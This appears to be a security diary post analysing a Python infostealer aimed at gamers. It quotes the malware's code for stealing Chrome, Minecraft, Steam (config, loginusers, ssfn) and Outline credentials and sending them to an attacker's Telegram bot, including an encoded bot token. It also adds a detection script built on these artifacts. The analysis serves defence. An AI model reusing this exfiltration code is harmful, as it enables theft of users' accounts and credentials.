Python Infostealer Targeting Gamers
There are a lot of “gamers” on the Internet, and they generate a lot of business around games. Many games can be downloaded for free, but they have online shops selling options like extra lives, weapons, suits, packages, etc. The business of gaming is therefore very lucrative today[1].
I spotted a malicious Python script that acts as an info stealer focusing on gamers! Based on strings found in the code, the attribution goes to Russia (“????????? ??????” can be translated to "a new connection has been established”).
Today, most Python malicious scripts use Discord as a C2, but this one uses Telegram:
bot = telebot.TeleBot(base64.b64decode("NTk1OTUwNzYxODpBQUhmNzBRcVBYMkNiNHNjSzkyZGJwZnVhTEVaQlNWdkVRWQ==").decode("utf-8"), parse_mode=None)
The script implements the classic code to steal cookies and credentials from a Chrome installation, but it also searches for resources used by gamers.
First, Chrome data is inspected, and only interesting domains are searched:
target_domain = [ "minecraft.net", "google.com", "live.com", "apple.com", "twitter.com", "spotify.com", "discord.com", "discord.gg", "blockchain.com", "coinbase.com", "paypal.com", "mojang.com", "steamcommunity.com", "steampowered.com", "origin.com", "ea.com", "ubisoft.com" ]
Then, the script searches for the presence of Minecraft:
if os.path.isdir(apps["Minecraft"]):
    AccountsPath = apps["Minecraft"] + "launcher_accounts_microsoft_store.json"
    with open(AccountsPath, encoding="utf-8", mode="r") as f:
        file = json.load(f)
    try:
        for account in file["accounts"]:
            ms_username = file["accounts"][account]["username"]
            minecraft_username = file["accounts"][account]["minecraftProfile"]["name"]
            for user in send_to_users:
                bot.send_message(user, f"?Minecraft Installed\n?Microsoft: `{ms_username}`\n?Minecraft: `{minecraft_username}`", parse_mode="MARKDOWN")
    except KeyError:
        pass
Steam[2] is a well-known platform for downloading games. The script tries to exfiltrate useful information from a Steam setup:
try:
    steam_reg = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path_steam, 0, access=winreg.KEY_READ)
    steampath = winreg.EnumValue(steam_reg, 2)[1]
    steam_auto_login = (winreg.EnumValue(steam_reg, 8))[1]
    steam_lang = (winreg.EnumValue(steam_reg, 0))[1]
    steam_config = steampath + "/config/config.vdf"
    steam_users = steampath + "/config/loginusers.vdf"
    steam_ssfn = []
    for filename in os.listdir(steampath):
        if "ssfn" in filename:
            steam_ssfn.append(filename)
    steam_installed = True
except FileNotFoundError:
    steam_auto_login = "not installed"
    steam_lang = "undefined"
    steam_installed = False

send_to_users = [1084445274]
for user in send_to_users:
    bot.send_message(user, f"????????? ?????? `{datetime.datetime.now()}`\n?IP: `{stun.get_ip_info()}`\n?Computer Name: `{socket.gethostname()}`\n??User: `{os.getlogin()}`\n?OC: `{platform.platform()}`\n??Steam Login: `{steam_auto_login}`\n?Steam Language: `{steam_lang}`", parse_mode="MARKDOWN")
    if steam_installed == True:
        bot.send_message(user, "=====STEAM FILES=====", parse_mode="MARKDOWN")
        bot.send_document(user, open(steam_config, "r", encoding="utf-8"), caption="steam_config")
        bot.send_document(user, open(steam_users, "r", encoding="utf-8"), caption="steam_users")
        for filename in steam_ssfn:
            with open(f"{steampath}/(unknown)", "rb") as file:
                bot.send_document(user, file, caption=f"`(unknown)`", parse_mode="MARKDOWN")
                file.close()
The script also searches for Outline Manager instances:
if os.path.isdir(apps["Outline"]):
    AccountsPath = apps["Outline"] + "000003.log"
    with open(AccountsPath, mode="r") as file:
        for string in file.read().splitlines():
            if "accessKey" in string:
                key = string
                reg = re.compile('[^a-zA-Z0-9"@.,:/?-]')
                key = reg.sub('', key)
                for user in send_to_users:
                    bot.send_message(user, f"?Outline (LOG): `{key}`", parse_mode="MARKDOWN")
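The traits shown above (a base64-hidden Telegram bot token and a fixed set of gamer-related files) are easy to turn into a triage check. The following script is an added example written for this diary, not part of the sample or of any tool mentioned here; the file-name and API-name list, the scoring and the constructed sample script are my own assumptions.

```python
import base64
import re

# Telegram bot tokens have the shape "<8-10 digits>:<35 chars of [A-Za-z0-9_-]>".
TOKEN_RE = re.compile(r"^\d{8,10}:[A-Za-z0-9_-]{35}$")
# Quoted string literals made only of base64 characters (the stealer hides its token this way).
B64_LITERAL_RE = re.compile(r'["\']([A-Za-z0-9+/]{20,}={0,2})["\']')

# Strings the diary's sample touches on disk or in code, mapped to a label for the triage report.
GAMER_ARTIFACTS = {
    "launcher_accounts_microsoft_store.json": "minecraft-launcher-accounts",
    "loginusers.vdf": "steam-loginusers",
    "config.vdf": "steam-config",
    "ssfn": "steam-ssfn-auth-file",
    "000003.log": "outline-manager-log",
    "telebot.TeleBot": "telegram-bot-c2",
    "send_document": "telegram-file-exfil",
}

def decoded_telegram_tokens(source):
    """Base64-decode every candidate literal and keep those shaped like a bot token."""
    tokens = []
    for match in B64_LITERAL_RE.finditer(source):
        try:
            text = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or not text once decoded
        if TOKEN_RE.match(text):
            tokens.append(text)
    return tokens

def triage(source):
    """Return the gamer-related artifacts and hidden Telegram tokens found in a script."""
    artifacts = sorted({label for needle, label in GAMER_ARTIFACTS.items() if needle in source})
    tokens = decoded_telegram_tokens(source)
    # A decoded bot token is a strong signal, so it weighs more than a single artifact.
    return {"artifacts": artifacts, "telegram_tokens": tokens, "score": len(artifacts) + 2 * len(tokens)}

# Constructed sample (not the real script): a fake token with the right shape, base64-encoded
# the same way the diary's sample hides its own, plus a few of the file names it looks for.
FAKE_TOKEN = "1234567890:AAFakeTokenForTestingOnly0000000000"
SAMPLE_SCRIPT = (
    'bot = telebot.TeleBot(base64.b64decode("%s").decode("utf-8"))\n'
    'AccountsPath = apps["Minecraft"] + "launcher_accounts_microsoft_store.json"\n'
    'if "ssfn" in filename: bot.send_document(user, file)\n'
) % base64.b64encode(FAKE_TOKEN.encode()).decode()

if __name__ == "__main__":
    print(triage(SAMPLE_SCRIPT))
```

Run it against suspicious .py or .pyc-decompiled files; a non-empty token list is worth reporting to Telegram so the bot can be taken down.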
Nothing brand new with this sample, except that it targets gamers. Money is involved in games (sometimes a lot), so gamers are nice targets for attackers. Stay safe!
[1] https://newzoo.com/insights/articles/the-games-market-in-2022-the-year-in-numbers
[2] https://store.steampowered.com
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key